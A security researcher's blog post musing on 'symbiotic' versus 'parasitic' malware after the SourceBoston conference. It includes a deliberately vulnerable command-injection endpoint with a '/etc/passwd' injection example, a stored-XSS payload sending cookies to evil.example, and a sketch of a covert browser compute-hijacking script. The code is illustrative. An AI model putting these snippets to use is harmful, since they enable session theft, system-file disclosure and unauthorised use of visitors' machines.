Whelp, I just concluded my rather long trip to Boston for the first annual SourceBoston conference. I actually had a great time. There were a few bugs in the conference here and there, but that's not unexpected for any first-time conference (totally forgivable). I expect it to grow quite a bit in the future given the quality of the talks I heard there. The talks were almost without exception technical or business oriented enough that I had a difficult time picking and choosing which ones I wanted to go to. So much so that this was the very first time I've ended up buying a talk recording after the conference was over. I'm glad I did too. The telephone defenses talk by James Atkinson was excellent - long (2.25 hours) but excellent.
The keynotes were all great, but the one that really stood out in my mind was the talk by Dan Geer. It was a fast-paced speech with a lot of specifics about the parallels between genetics/biology and viral/worm propagation. Later that evening, a bunch of the more technical/business people were asked to go to a dinner with Polaris Ventures. There I got a chance to speak with Dan a little more and gently chastised him for not mentioning Samy, which I think intrigued him.
After the dinner, I began thinking about one concept that was mentioned during Dan's talk and was echoed a number of times during the dinner and then again the next day. The concept was that on some networks we are seeing a shift from parasitic malicious software to symbiotic malicious software. That is, some of the best maintained machines are run by attackers. They are up to date, patched, the logs aren't writing off the end of the disk, etc… Bad guys take a great deal of pride and care in their machines, trying to keep other hackers off the boxes, and they end up doing quite a bit of defensive work to ensure they keep the ability to maintain and control the box.
Okay, here's where it gets really weird. Now let's take that to its next logical, bizarre conclusion - often machines are healthier with an attacker on them than without. In fact, bad guys really do their best to make sure they aren't saturating the connection or making the machine too slow. It's in their best interest to have their control over the machine persist. It's a strange malicious harmony, where the host is fed and nourished by the aggressor organism. But that only really makes sense when an attacker has access to the system and can control the inner workings of the computer itself. Are there any parallels between this and web application security?
I've thought about this quite a bit over the last few days and I can't come up with a single real-world instance where a malicious attack that doesn't involve some level of OS compromise has been healthy for the host system in any way. Once you begin talking about remote file includes and command injection, it's the same thing as a typical worm or virus scenario, where the attacker may take a great deal of time and energy to protect the system, leaving only small back doors for themselves to recover control at will. But all the compromises that don't allow for any form of system/OS level control have only damaging effects. XSS worms, CSRF, SQL injection, etc… None of these have any positive effects on the host system.
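To make that dividing line concrete, here's a minimal sketch of why command injection lands on the OS-compromise side. It's a hypothetical vulnerable Node.js/Express "ping this host" endpoint I made up for illustration - nothing from the conference or the talks:

```typescript
// Hypothetical vulnerable endpoint, purely for illustration.
// User input is spliced straight into a shell command.
import { exec } from "child_process";
import express from "express";

const app = express();

app.get("/ping", (req, res) => {
  const host = String(req.query.host);
  // Vulnerable: a request like /ping?host=8.8.8.8;cat%20/etc/passwd runs a
  // second, attacker-chosen command. At that point the attacker is operating
  // at the OS level, exactly like a worm or virus payload would - which is
  // why this class belongs in the same bucket as full system compromise.
  exec(`ping -c 1 ${host}`, (err, stdout, stderr) => {
    res.type("text/plain").send(err ? stderr : stdout);
  });
});

app.listen(3000);
```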
But each of those classes of vulnerabilities also shares one other thing - with the exception of persistent XSS/HTML injection or changes to the database, they each have very little longevity compared to OS compromises. Adding an account to a database clearly can persist indefinitely, but more often than not a bad guy is less interested in adding to a database than in extracting information out of it, meaning the longevity is an afterthought. Persistent XSS that performs overtly malicious actions is typically uncovered quickly because of the real-time effects it has against the normal user base.
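As a made-up illustration of that longevity gap, compare two hypothetical stored-XSS payloads (neither is a real sample, and evil.example is a placeholder collection host):

```typescript
// Overt: defaces the page for every visitor. The real-time effect means users
// notice and report it almost immediately, so it gets cleaned out fast.
const overtPayload = `<script>document.body.innerHTML = "Hacked!";</script>`;

// Quiet: silently ships each visitor's session cookie off-site. Nothing
// visible changes for the user, so the record can sit in the database until
// someone actually audits the stored content.
const quietPayload = `<script>new Image().src =
  "//evil.example/c?" + encodeURIComponent(document.cookie);</script>`;
```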
With that in mind, it would appear that the less persistent the attack, the worse it is for the host system in terms of any tangible side benefits the attacker can bring to the table. There is little to no symbiosis in these forms of web application attacks. Now clearly you'd say it's better to suffer an XSS attack than a full computer compromise, and I'm not naive enough to think bad guys really care about the system. Rather, their interests lie in maintaining control over their assets, which is an issue of economic loss aversion. But I definitely think there are some interesting side effects of malicious attacks here that are worth thinking through a little more.
Further, one rather interesting argument I've heard for protecting machines is increased OS longevity, which saves enterprises the productivity loss incurred when machine re-installs are required. This really becomes a problem when rampant spyware slows a machine down to the point where it's almost unusable, or even unstable because of the poor quality of the spyware code, forcing the owner to complain to their IT department. In that case it's parasitic software. So perhaps what we are really interested in is stopping parasitic software and encouraging symbiotic software to lower IT costs. As long as the machine contains nothing sensitive, symbiotic software would end up driving down support costs - provided there were no other negative effects, like having your IP space black-holed for sending out too much spam. It sounds crazy, I know.
Jeremiah and I were talking about this with Dan from Polaris yesterday though. If you could somehow use XSS as a way to do distributed computation for processor-intensive operations, you could potentially sell that capacity to people who have high levels of computational need. I like that idea less than offering users a free download in exchange for spare processor time or a slice of bandwidth when the machine is not in use (symbiotic), in trade for hardening the machine against purely malicious (parasitic) attackers. We've seen things like this in the past - SETI@home and the RC5 distributed cracking - but I consider both of those to be parasitic, offering little to nothing to the host machine. Interesting thought, anyway…
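Purely as a thought experiment, here's a rough sketch of what that "XSS as compute" idea might look like: an injected script that pulls a work unit from a coordinator, grinds through it, posts the answer back, and throttles itself so the victim's browser stays responsive. The /work and /result endpoints and the job format are all invented for this sketch:

```typescript
// Hypothetical "XSS as distributed compute" payload. The endpoints and the
// WorkUnit shape are made up for illustration.
interface WorkUnit { id: string; start: number; end: number; target: number; }

async function workLoop(): Promise<void> {
  while (true) {
    // Pull the next chunk of work from the (hypothetical) coordinator.
    const job: WorkUnit = await (await fetch("/work")).json();

    // Stand-in for a CPU-bound task: scan a numeric range for a value whose
    // cheap 32-bit hash matches the target (think key search or cracking).
    let hit = -1;
    for (let n = job.start; n < job.end; n++) {
      if ((Math.imul(n, 2654435761) >>> 0) % 1000003 === job.target) {
        hit = n;
        break;
      }
    }

    // Report the result back to the coordinator.
    await fetch("/result", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ id: job.id, hit }),
    });

    // The "symbiotic" constraint from above: pause between chunks so the
    // page stays responsive and the user never notices the borrowed cycles.
    await new Promise((resolve) => setTimeout(resolve, 250));
  }
}

workLoop();
```

Note the throttle at the end - it's the same economic logic as the well-maintained botnet box: the scheme only keeps working as long as the host never notices.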